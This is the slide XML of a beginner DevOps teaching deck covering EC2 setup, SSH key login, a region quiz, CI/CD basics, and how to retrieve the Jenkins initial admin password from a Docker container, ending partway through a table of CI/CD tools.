        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1167425"/>
            <a:ext cx="8520600" cy="1888800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="133333"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1800"/>
              </a:spcAft>
              <a:buSzPts val="990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3920">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Provisioning(Setup) a ec2 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3920">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>instance</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3920">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (server) will take around 5-10 min time.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3920">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>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332"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1167425"/>
            <a:ext cx="8520600" cy="2923800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="133333"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pem = Privacy Enhanced Mail</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="133333"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ppk = Putty Private Key</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="133333"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1800"/>
              </a:spcAft>
              <a:buSzPts val="990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ssh = </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Secure Socket Shell</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>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333"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="387900" y="1015025"/>
            <a:ext cx="8520600" cy="2923800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="133333"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="133333"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ssh -i &lt;identityFile&gt; username@ip</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="133333"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="133333"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1800"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="990"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ssh -i ReactPem.pem ubuntu@52.66.244.68</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3100">
              <a:solidFill>
                <a:srgbClr val="6AA84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55"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="3947" l="40602" r="6810" t="5930"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1883400" y="77000"/>
            <a:ext cx="5176152" cy="4989500"/>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p334"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="387900" y="1306150"/>
            <a:ext cx="8520600" cy="2632800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="133333"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1800"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="990"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If you want to </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>deploy</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t> an application for singapore customer, you provision the server in _ _ _ _ _ _ _ _ _ </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>region</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2049" name="Google Shape;2049;p334"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2008300" y="431125"/>
            <a:ext cx="5410200" cy="10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solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Quiz</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="5200">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>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pic>
        <p:nvPicPr>
          <p:cNvPr id="2054" name="Google Shape;2054;p33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3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0" name="Google Shape;2060;p3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CI / CD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CI = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Continuous</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Integration</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>CD = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Continuous</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> Delivery </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pic>
        <p:nvPicPr>
          <p:cNvPr id="2065" name="Google Shape;2065;p337"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="174838"/>
            <a:ext cx="9144001" cy="4793814"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2066" name="Google Shape;2066;p337"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7035240" y="332450"/>
            <a:ext cx="1850850" cy="527600"/>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338"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="12438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320">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What is Jenkins?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3320">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2072" name="Google Shape;2072;p338"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="387900" y="2072975"/>
            <a:ext cx="8520600" cy="10563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sz="3800">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jenkins is a software which automate our deployment process.</a:t>
            </a:r>
            <a:endParaRPr sz="3800">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>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339"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="3901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320">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to get the jenkins password ?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3320">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2078" name="Google Shape;2078;p339"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="473275" y="1293975"/>
            <a:ext cx="8520600" cy="29361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Clr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Docker Logs</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Executing cat command from outside the container</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Go inside the container and cat the initialPasswordFile</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>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340"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="3901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320">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to get the jenkins password ?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3320">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2084" name="Google Shape;2084;p340"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="281075" y="1293975"/>
            <a:ext cx="8789100" cy="29361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Clr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Courier New"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>docker container logs &lt;contId/contName&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Courier New"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>docker container exec </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;contId/contName&gt; &lt;command&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Courier New"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>docker container exec -it &lt;contId/contName&gt; &lt;shell&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>3.1  cat &lt;JenkinPasswordFileLocation&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>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341"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="375725" y="1106625"/>
            <a:ext cx="8520600" cy="319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150">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Create a simplest </a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="4150">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="4150">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>CI/CD pipeline </a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="4150">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="4150">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>for reactjs application using jenkins</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="6320">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>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342"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631725" y="254375"/>
            <a:ext cx="7768500" cy="44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600">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CI / CD Tools</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="5600">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2095" name="Google Shape;2095;p342"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="876300" y="1019400"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{5F29EBE2-DF6B-4956-BA54-5617D0952659}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3619500"/>
                <a:gridCol w="3619500"/>
              </a:tblGrid>
              <a:tr h="320650">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="2400">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Tool</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="2400">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="2400">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Free/Paid</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="2400">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="320650">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Jenkins</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
